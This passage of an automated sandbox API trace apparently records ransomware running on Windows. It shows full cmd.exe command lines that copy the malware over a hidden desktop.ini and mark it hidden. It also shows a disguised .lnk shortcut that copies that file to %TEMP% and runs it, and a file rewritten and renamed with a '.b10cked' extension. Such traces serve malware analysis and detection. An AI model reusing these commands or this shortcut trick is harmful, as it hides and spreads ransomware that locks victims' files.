cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\bl0cked-readme.rtf")) returned 0x20 [0205.285] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0205.285] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0205.286] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0205.286] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0205.286] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0205.286] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0205.286] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0205.286] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\") returned 0x24 [0205.286] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0205.286] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0205.286] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1") returned 0x23 [0205.287] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x14a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x14a [0205.287] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0205.287] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x4d4, dwThreadId=0xd68)) returned 1 [0205.292] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0206.668] CloseHandle (hObject=0x120) returned 1 [0206.668] CloseHandle (hObject=0x1b4) returned 1 [0206.668] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0206.668] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0206.668] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0206.668] GetTickCount () returned 0x3a2a4 [0206.668] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26345742086) returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x64\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0206.669] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0206.669] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0206.669] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0206.669] CharUpperBuffW (in: lpsz="explorer.exe \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\" & type \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\" & TYPE \"{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && 
\"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0206.669] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0206.669] CharUpperBuffW (in: lpsz="explorer.exe \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\" & type \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\" & TYPE \"{E6E75766-DA0F-4BA2-9788-6EA593CE702D}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0206.669] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0206.669] CoInitialize (pvReserved=0x0) returned 0x0 [0206.669] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0206.671] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0206.671] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0206.671] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0206.673] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\" & type \"{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\desktop.ini\" > \"%TEMP%\\kLIRLKdN.exe\" && 
\"%TEMP%\\kLIRLKdN.exe\"") returned 0x0 [0206.673] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0206.673] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0206.674] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0206.674] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}.lnk", fRemember=0) returned 0x0 [0206.681] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0206.681] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0206.681] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0206.681] CoUninitialize () [0206.682] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0206.682] ReleaseMutex (hMutex=0xf8) returned 1 [0206.682] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0206.682] ReleaseMutex (hMutex=0xf8) returned 1 [0206.682] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0206.682] ReleaseMutex (hMutex=0xf8) returned 1 [0206.682] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0206.682] ReleaseMutex (hMutex=0xf8) returned 1 [0206.682] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26347294333) returned 1 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.684] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2fa [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0206.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0206.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0206.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2fa [0206.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0206.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0206.686] ReadFile (in: hFile=0x120, lpBuffer=0x12e35c8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12e35c8*, lpNumberOfBytesRead=0x12ec08*=0x17c, lpOverlapped=0x0) returned 1 [0206.709] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0206.709] WriteFile (in: hFile=0x120, lpBuffer=0x12e35c8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12e35c8*, lpNumberOfBytesWritten=0x12ec1c*=0x17c, lpOverlapped=0x0) returned 1 [0206.709] SetFilePointer (in: hFile=0x120, lDistanceToMove=-380, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x17e [0206.709] ReadFile (in: hFile=0x120, lpBuffer=0x12e35c8, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12e35c8*, lpNumberOfBytesRead=0x12ec08*=0x17c, lpOverlapped=0x0) returned 1 [0206.709] SetFilePointer (in: hFile=0x120, lDistanceToMove=-380, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x17e [0206.709] WriteFile (in: hFile=0x120, lpBuffer=0x12e35c8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12e35c8*, lpNumberOfBytesWritten=0x12ec1c*=0x17c, lpOverlapped=0x0) returned 1 [0206.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0206.715] WideCharToMultiByte (in: 
CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x131324c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0206.715] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2fa [0206.715] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0206.715] CloseHandle (hObject=0x120) returned 1 [0206.716] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm") returned 0x2d [0206.716] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\") returned 0x24 [0206.726] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
